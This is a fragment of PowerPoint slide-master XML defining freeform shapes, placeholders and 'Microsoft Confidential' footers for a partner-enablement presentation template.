                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="91" y="43"/>
                    <a:pt x="91" y="41"/>
                    <a:pt x="92" y="40"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="93" y="37"/>
                    <a:pt x="95" y="36"/>
                    <a:pt x="98" y="36"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="99" y="37"/>
                    <a:pt x="101" y="38"/>
                    <a:pt x="102" y="39"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="103" y="42"/>
                    <a:pt x="103" y="45"/>
                    <a:pt x="102" y="47"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="102" y="48"/>
                    <a:pt x="101" y="49"/>
                    <a:pt x="102" y="50"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="104" y="51"/>
                    <a:pt x="107" y="50"/>
                    <a:pt x="107" y="48"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="107" y="43"/>
                    <a:pt x="107" y="39"/>
                    <a:pt x="105" y="35"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="103" y="31"/>
                    <a:pt x="100" y="29"/>
                    <a:pt x="96" y="29"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="91" y="30"/>
                    <a:pt x="88" y="33"/>
                    <a:pt x="87" y="37"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="87" y="39"/>
                    <a:pt x="87" y="40"/>
                    <a:pt x="87" y="42"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="87" y="43"/>
                    <a:pt x="87" y="45"/>
                    <a:pt x="87" y="47"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="85" y="45"/>
                    <a:pt x="83" y="45"/>
                    <a:pt x="81" y="45"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="80" y="45"/>
                    <a:pt x="80" y="45"/>
                    <a:pt x="80" y="46"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="78" y="46"/>
                    <a:pt x="78" y="45"/>
                    <a:pt x="78" y="44"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="77" y="41"/>
                    <a:pt x="77" y="38"/>
                    <a:pt x="76" y="36"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="76" y="35"/>
                    <a:pt x="76" y="34"/>
                    <a:pt x="76" y="34"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="74" y="32"/>
                    <a:pt x="73" y="30"/>
                    <a:pt x="70" y="30"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="68" y="31"/>
                    <a:pt x="67" y="32"/>
                    <a:pt x="66" y="34"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="63" y="39"/>
                    <a:pt x="63" y="44"/>
                    <a:pt x="66" y="49"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="66" y="50"/>
                    <a:pt x="67" y="51"/>
                    <a:pt x="68" y="51"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="69" y="51"/>
                    <a:pt x="69" y="50"/>
                    <a:pt x="69" y="49"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="69" y="48"/>
                    <a:pt x="68" y="48"/>
                    <a:pt x="67" y="47"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="66" y="45"/>
                    <a:pt x="65" y="42"/>
                    <a:pt x="66" y="39"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="67" y="37"/>
                    <a:pt x="71" y="36"/>
                    <a:pt x="73" y="38"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="74" y="39"/>
                    <a:pt x="75" y="42"/>
                    <a:pt x="75" y="44"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="75" y="46"/>
                    <a:pt x="74" y="47"/>
                    <a:pt x="73" y="48"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="73" y="48"/>
                    <a:pt x="72" y="48"/>
                    <a:pt x="72" y="49"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="71" y="51"/>
                    <a:pt x="69" y="52"/>
                    <a:pt x="66" y="53"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="65" y="54"/>
                    <a:pt x="65" y="55"/>
                    <a:pt x="64" y="56"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="63" y="57"/>
                    <a:pt x="64" y="58"/>
                    <a:pt x="65" y="59"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="66" y="60"/>
                    <a:pt x="67" y="61"/>
                    <a:pt x="68" y="62"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="70" y="66"/>
                    <a:pt x="74" y="66"/>
                    <a:pt x="78" y="66"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="82" y="66"/>
                    <a:pt x="87" y="64"/>
                    <a:pt x="91" y="63"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="94" y="62"/>
                    <a:pt x="98" y="61"/>
                    <a:pt x="101" y="58"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="101" y="58"/>
                    <a:pt x="102" y="57"/>
                    <a:pt x="103" y="58"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="103" y="58"/>
                    <a:pt x="103" y="59"/>
                    <a:pt x="103" y="60"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="103" y="60"/>
                    <a:pt x="102" y="61"/>
                    <a:pt x="102" y="61"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="97" y="63"/>
                    <a:pt x="91" y="65"/>
                    <a:pt x="86" y="67"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="82" y="69"/>
                    <a:pt x="78" y="69"/>
                    <a:pt x="74" y="69"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="73" y="68"/>
                    <a:pt x="72" y="68"/>
                    <a:pt x="71" y="68"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="73" y="45"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="73" y="43"/>
                    <a:pt x="73" y="41"/>
                    <a:pt x="72" y="40"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="71" y="39"/>
                    <a:pt x="71" y="39"/>
                    <a:pt x="70" y="39"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="70" y="40"/>
                    <a:pt x="70" y="40"/>
                    <a:pt x="70" y="40"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="72" y="41"/>
                    <a:pt x="71" y="42"/>
                    <a:pt x="71" y="43"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="71" y="44"/>
                    <a:pt x="72" y="45"/>
                    <a:pt x="73" y="45"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="97" y="39"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="99" y="40"/>
                    <a:pt x="99" y="41"/>
                    <a:pt x="100" y="43"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="100" y="43"/>
                    <a:pt x="101" y="43"/>
                    <a:pt x="101" y="42"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="101" y="41"/>
                    <a:pt x="100" y="40"/>
                    <a:pt x="99" y="39"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="98"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446"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5762" y="1153"/>
              <a:ext cx="3" cy="4"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 2 w 2"/>
                <a:gd name="T1" fmla="*/ 1 h 3"/>
                <a:gd name="T2" fmla="*/ 1 w 2"/>
                <a:gd name="T3" fmla="*/ 2 h 3"/>
                <a:gd name="T4" fmla="*/ 0 w 2"/>
                <a:gd name="T5" fmla="*/ 3 h 3"/>
                <a:gd name="T6" fmla="*/ 0 w 2"/>
                <a:gd name="T7" fmla="*/ 1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1"/>
                    <a:pt x="2" y="2"/>
                    <a:pt x="1" y="2"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="3"/>
                    <a:pt x="0" y="3"/>
                    <a:pt x="0" y="3"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="2"/>
                    <a:pt x="0" y="2"/>
                    <a:pt x="0" y="1"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="1"/>
                    <a:pt x="1" y="1"/>
                    <a:pt x="2" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2" y="0"/>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Freeform 447"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5774" y="1153"/>
              <a:ext cx="5" cy="2"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 4"/>
                <a:gd name="T1" fmla="*/ 0 h 2"/>
                <a:gd name="T2" fmla="*/ 3 w 4"/>
                <a:gd name="T3" fmla="*/ 1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1"/>
                    <a:pt x="3" y="1"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3" y="1"/>
                    <a:pt x="3" y="1"/>
                    <a:pt x="4" y="2"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3" y="2"/>
                    <a:pt x="3" y="2"/>
                    <a:pt x="2"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5" name="Freeform: Shape 484"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="-2" y="0"/>
            <a:ext cx="6762953" cy="6858000"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 7294818"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX1" fmla="*/ 3978914 w 7294818"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX2" fmla="*/ 4057397 w 7294818"/>
              <a:gd name="connsiteY2" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX3" fmla="*/ 5871241 w 7294818"/>
              <a:gd name="connsiteY3" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX4" fmla="*/ 7294818 w 7294818"/>
              <a:gd name="connsiteY4" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX5" fmla="*/ 5871241 w 7294818"/>
              <a:gd name="connsiteY5" fmla="*/ 6858000 h 6858000"/>
              <a:gd name="connsiteX6" fmla="*/ 4057397 w 7294818"/>
              <a:gd name="connsiteY6" fmla="*/ 6858000 h 6858000"/>
              <a:gd name="connsiteX7" fmla="*/ 3978914 w 7294818"/>
              <a:gd name="connsiteY7" fmla="*/ 6858000 h 6858000"/>
              <a:gd name="connsiteX8" fmla="*/ 0 w 729481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4818" h="6858000">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3978914" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4057397" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5871241" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7294818" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5871241" y="6858000"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4057397" y="6858000"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3978914" y="6858000"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="685800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a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="+mj-lt"/>
              <a:ea typeface="Segoe UI" pitchFamily="34" charset="0"/>
              <a:cs typeface="Segoe UI" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="498" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="683257" y="1562893"/>
            <a:ext cx="5258796" cy="3732214"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr bIns="274320" anchor="ctr" anchorCtr="0"/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:defRPr sz="7200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="446" name="Freeform: Shape 445"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5334508" y="0"/>
            <a:ext cx="1522984" cy="6858000"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 1319784 w 1522984"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX1" fmla="*/ 1522984 w 1522984"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX2" fmla="*/ 203200 w 1522984"/>
              <a:gd name="connsiteY2" fmla="*/ 6858000 h 6858000"/>
              <a:gd name="connsiteX3" fmla="*/ 0 w 1522984"/>
              <a:gd name="connsiteY3" fmla="*/ 6858000 h 6858000"/>
              <a:gd name="connsiteX4" fmla="*/ 1319784 w 152298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984" h="6858000">
                <a:moveTo>
                  <a:pt x="1319784" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1522984" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="203200" y="6858000"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="6858000"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1319784" y="0"/>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a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="+mj-lt"/>
              <a:ea typeface="Segoe UI" pitchFamily="34" charset="0"/>
              <a:cs typeface="Segoe UI" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="297423154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Agenda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3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="14"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="263524" y="1420824"/>
            <a:ext cx="11660789" cy="4852747"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr tIns="91440" bIns="91440"/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="C0000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1177" y="6603024"/>
            <a:ext cx="12192313" cy="265884"/>
            <a:chOff x="-1200" y="6644680"/>
            <a:chExt cx="12436794" cy="360970"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="TextBox 8"/>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0" name="TextBox 9"/>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65413112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6147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6" name="Text Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="269241" y="1297501"/>
            <a:ext cx="11653523" cy="1988942"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr sz="1961"/>
            </a:lvl2pPr>
            <a:lvl3pPr marL="224011" indent="0">
              <a:buNone/>
              <a:defRPr/>
            </a:lvl3pPr>
            <a:lvl4pPr marL="448021" indent="0">
              <a:buNone/>
              <a:defRPr/>
            </a:lvl4pPr>
            <a:lvl5pPr marL="67203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9388711" y="6536998"/>
            <a:ext cx="2742188" cy="191648"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr algn="r">
              <a:defRPr sz="1174">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{181750B2-C378-4896-80E6-341FDC8E0FED}" type="slidenum">
              <a:rPr lang="en-IN"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3"/>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5333012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3653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Title only_2">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a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="865" y="0"/>
            <a:ext cx="12191945" cy="6858001"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="-811" y="1"/>
            <a:ext cx="12192811" cy="6858000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1">
              <a:alpha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a:xfrm>
            <a:off x="1"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rgbClr val="002050"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1">
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>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207401375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p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="14"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="448212" y="6437742"/>
            <a:ext cx="3859607" cy="133860"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr fontAlgn="base">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="505050"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr defTabSz="914367">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="882">
                <a:latin typeface="Segoe UI"/>
              </a:rPr>
              <a:t>Microsoft Confidential</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="207262507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Footer Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="14"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="448212" y="6437742"/>
            <a:ext cx="3859607" cy="133860"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr fontAlgn="base">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="505050"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr defTabSz="914367">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="882">
                <a:latin typeface="Segoe UI"/>
              </a:rPr>
              <a:t>Microsoft Confidential</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="285756613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Commercial Sales Solution Tours">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43" name="Rectangle 42">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7AA9E55C-7145-44AA-A194-18A56141D1B4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7440637" y="683776"/>
            <a:ext cx="4783277" cy="1421928"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="4800" b="1" spc="-98">
                <a:ln w="3175">
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Partner Practice Enablement</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4800" b="1" spc="-98">
              <a:ln w="3175">
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              <a:cs typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="37" name="Picture 36">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5F557F69-8913-447D-9AE6-ED17933C30E8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6259750" y="2587752"/>
            <a:ext cx="5932250" cy="3439777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4147732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507586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16461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933861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74455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68430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08379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428774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730931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601083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53802106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99510934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250204513"/>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2165734956"/>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52954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82864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5241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2127190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38760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45493428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Content Slide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3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="14"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="263524" y="1420824"/>
            <a:ext cx="11660789" cy="4852747"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr tIns="91440" bIns="91440"/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="C0000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p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-1177" y="6603024"/>
            <a:ext cx="12192313" cy="265884"/>
            <a:chOff x="-1200" y="6644680"/>
            <a:chExt cx="12436794" cy="360970"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="18" name="TextBox 17"/>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9" name="TextBox 18"/>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96926610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63949" y="289511"/>
            <a:ext cx="11655078" cy="1051560"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Lorem ipsum dolor sit.</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="11" name="Group 10"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-1177" y="6603024"/>
            <a:ext cx="12192313" cy="265884"/>
            <a:chOff x="-1200" y="6644680"/>
            <a:chExt cx="12436794" cy="360970"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="12" name="TextBox 11"/>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3" name="TextBox 12"/>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771353901"/>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917">
          <p15:clr>
            <a:srgbClr val="FBAE40"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="3" orient="horz" pos="523">
          <p15:clr>
            <a:srgbClr val="FBAE40"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="4" pos="29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Image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7" name="Picture Placeholder 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" sz="quarter" idx="12" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="264570" y="1420824"/>
            <a:ext cx="7151167" cy="4852747"/>
          </a:xfrm>
          <a:ln w="152400">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr tIns="91440" bIns="91440"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Screen shot or image here</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7415737" y="1420824"/>
